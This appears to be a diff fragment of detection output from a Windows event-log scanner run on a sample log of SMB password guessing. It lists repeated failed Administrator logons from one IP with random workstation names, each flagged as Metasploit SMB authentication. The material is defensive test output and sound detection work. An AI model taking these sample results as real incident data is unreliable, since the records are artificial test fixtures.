+2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3rZHUbOUVBYiHarB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: otv8ByrbWWoTz7pi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HVlHkJu4Gxc9dhxM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xKF5OCqLVVKvung0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: avAdpkOlP0xji1vG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VFgzMjEz6M0LBnX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kdJb0obVAqkY9GCw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6ciSoQcLUgLfzaNg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RECrGCCTJuDPlvYJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Z2w67uyC2NOgecT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lRVetRdHvz0lJkOC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yXrtxquzyzxKnQgD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pWOoEIEem7Q9Mdx0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 86n5nIm04810NptD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M08noHtTqqx3pxSe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3P983pRVfCVlVTyA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eMKlcLvRhlx9FMcZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0gwEDgRF2wUgTDAy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I9Q2GSALfiuEbulo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DKTja76Qe9vSjrdN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXXuUyKlvaOgMNSu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X3qdEQReXwHAZUS8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FqtfHJKOfmWXEd4s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mVv7vete3uXixggi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0PF6E3wRP0Tk39ss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: touwF4IXUahG7jvJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lMOi7rygc7SJ5TPQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QjM1K5eFSA9U37oE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HgzyZqFU9v2kDVvG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hJeVj2h0sBxwBuGv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FNXI8b6Zcj1zU3JY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q9DyH9oxFbRTCQ80  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5LZo1ljGLOVKhwcC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GvY6Q7RGKwjehARC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uKLrHVMevqniTck8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ldxglvKFhLJQ3FV3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lRHIAxIj9wFRIg67  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mc7nvfyDfWpnhhBx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NB7Y4gPbxose5TsQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yKFU6DJ8Wdtp2qdC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YlbxRctdClWIOjss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LToi5ANf3tUteu4h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 52YPmYviVPBqJ39Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JpzKsyxEKNLd8l1u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r0vd6xEFevamX3jF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WR9gJBoN1ra4NI2M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
